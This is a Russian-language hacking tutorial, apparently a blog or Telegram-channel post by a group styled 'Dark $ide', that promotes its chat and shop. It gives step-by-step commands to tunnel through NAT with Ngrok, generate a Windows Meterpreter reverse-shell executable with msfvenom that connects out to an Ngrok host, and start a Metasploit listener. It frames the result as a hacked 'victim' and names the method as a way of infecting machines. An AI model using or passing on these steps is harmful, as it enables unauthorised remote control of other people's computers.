May 18, 2019

Взлом при помощи Metasploit + Ngrok. {Kali Linux}

https://tele.click/darkside_team

Привет хацкер, сегодня мы рассмотрим возможность устанавливать TCP соединение обходя NAT.

Нам понадобятся: Metasploit, Ngrok.

Ngrok — это платформа, которая с помощью установленной утилиты, позволяет, организовать удалённый доступ на веб-сервер или какой-то другой сервис, запущенный ПК. Доступ организуется через созданный при запуске ngrok безопасный туннель. ПК, при этом, может находиться за NAT’ом, и не иметь статического IP адреса.
Metasploit Project — проект, посвящённый информационной безопасности. Создан для предоставления информации об уязвимостях, помощи в создании сигнатур для IDS, создания и тестирования эксплойтов.

Приступим!

Для начала нам понадобится Ngrok, для того, чтобы его установить, переходим на официальный сайт проекта.

Здесь нам необходимо выполнить простую процедуру регистрации:

Теперь перейдём к установке, исходя из вашей битности кали, выбираем именно нужную версию:

Скачиваем, распаковываем, вводим токен, профит!11! (Все подробные моменты установки есть выше на картинке)

Теперь нам нужно поднять tcp соединение, делаем это командой в терминале:

./ngrok tcp 4444

Где 4444 - номер порта, tcp - тип соединения.

Обязательно дождись статуса online!

В этом окне нам понадобится лишь это:

tcp://0.tcp.ngrok.io:12529

У вас будет другой порт.

Это значит, что все запросы, которые отправляются на 0.tcp.ngrok.io через порт 12529 (в моём случае), будет перенаправлен на вашу тачку с портом который мы указали при запуске ngrok (4444). Терминал не закрываем, двигаемся дальше.

Открываем новый терминал сочетанием клавиш Shift + Ctrl + N

Здесь нам нужно создать пейлоад.

Пейлоад / Полезная нагрузка (payload) — часть червя, которая производит деструктивные действия с данными, копирование информации с заражённого компьютера и т. д. (в отличие от «транспортной части червя» («инфекционной» части, эксплойта), которая занимается его доставкой на атакуемую машину и заражением машины.
msfvenom -p windows /meterpreter/reverse_tcp LHOST=0.tcp.ngrok.io LPORT=ВАШПОРТ -f exe> payload.exe

Пейлоад готов! Осталось его запустить на другой машине, и сессия метерпретер у вас в кармане, но перед этим, нам нужно запустить "слушатель", который будет прослушивать порт 4444 для соединений. Делаем мы это командами в терминале:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST localhost
set LPORT 4444
exploit

Теперь, когда слушатель запущен, все TCP соединения перенаправляются нам на машину. Если пользователь запустит наш пейлоад, мы получаем активную сессию meterpreter:

Вот и всё, жертва взломана, мы довольны.

Это одно из многочисленных способов использования Ngrok, для заражения машин.

Если на этом посту наберём 15 лайков, сделаю новый пост по кали, удачи.

Dark $ide - Твоя Тёмная Сторона

Наш чат - Dark Chat | D$

Наш магазин - Dark $tore